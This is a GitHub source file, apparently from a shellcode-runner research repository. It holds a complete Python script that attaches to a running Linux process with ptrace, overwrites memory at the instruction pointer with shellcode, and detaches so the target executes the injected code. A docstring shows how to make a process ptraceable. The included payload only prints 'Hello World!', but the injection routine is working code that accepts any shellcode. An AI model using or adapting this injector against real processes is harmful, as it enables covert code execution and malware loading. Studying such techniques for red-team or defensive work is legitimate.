ShellcodeRunners/shellcode_injection_Linux.py at main · mauricelambert/ShellcodeRunners · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

###################
#    This repository implements multiples way to execute
#    shellcode with different platforms, systems and languages.
#    Copyright (C) 2023  Maurice Lambert

#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.

#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.

#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <https://www.gnu.org/licenses/>.
###################

"""
This repository implements multiples way to execute
shellcode with different platforms, systems and languages.

To exploit process injection on Linux the target process must be PTRACER.
from ctypes import cdll, c_ulong
libc = cdll.LoadLibrary("libc.so.6")
PR_SET_PTRACER = 0x59616d61
PR_SET_PTRACER_ANY = c_ulong(-1)
libc.prctl(PR_SET_PTRACER, PR_SET_PTRACER_ANY)
"""

__version__ = "0.0.1"
__author__ = "Maurice Lambert"
__author_email__ = "mauricelambert434@gmail.com"
__maintainer__ = "Maurice Lambert"
__maintainer_email__ = "mauricelambert434@gmail.com"
__description__ = """
This repository implements multiples way to execute
shellcode with different platforms, systems and languages.
"""
license = "GPL-3.0 License"
__url__ = "https://github.com/mauricelambert/ShellcodeRunners"

copyright = """
ShellcodeRunners  Copyright (C) 2023  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
"""
__license__ = license
__copyright__ = copyright

__all__ = []

print(copyright)

from ctypes import cdll, c_char_p, c_ulonglong, c_void_p
from sys import argv, stderr, exit

if len(argv) != 2:
    print(
        "USAGES: python3 shellcode_injection_Linux.py <pid:integer>",
        file=stderr,
    )
    exit(1)

pid = int(argv[1])
libc = cdll.LoadLibrary("libc.so.6")
shellcode = (
    b"\x48\xb8\x72\x6c\x64\x21\x0a\x00\x00\x00\x50\x48\xb8\x48\x65\x6c"
    b"\x6c\x6f\x20\x57\x6f\x50\x48\xc7\xc7\x01\x00\x00\x00\x48\x89\xe6"
    b"\x48\xc7\xc2\x0d\x00\x00\x00\x48\xc7\xc0\x01\x00\x00\x00\x0f\x05"
)

if libc.ptrace(16, pid, None, None):
    print("ptrace attach failed", file=stderr)
    exit(2)

if libc.waitpid(pid, None, 0) != pid:
    print("wait pid failed", file=stderr)
    exit(3)

registers = c_char_p((b"\0" * 8) * 27)
if libc.ptrace(12, pid, None, registers):
    print("ptrace get registers failed", file=stderr)
    exit(4)

rip = int.from_bytes(registers._objects[16 * 8 : 17 * 8], byteorder="little")
rip += 2

while shellcode:
    if libc.ptrace(
        4,
        pid,
        c_void_p(rip),
        c_ulonglong(int.from_bytes(shellcode[:8], byteorder="little")),
    ):
        print("ptrace write data failed", file=stderr)
        exit(5)
    shellcode = shellcode[8:]
    rip += 8

if libc.ptrace(17, pid, None, None):
    print("ptrace detach failed", file=stderr)
    exit(6)

exit(0)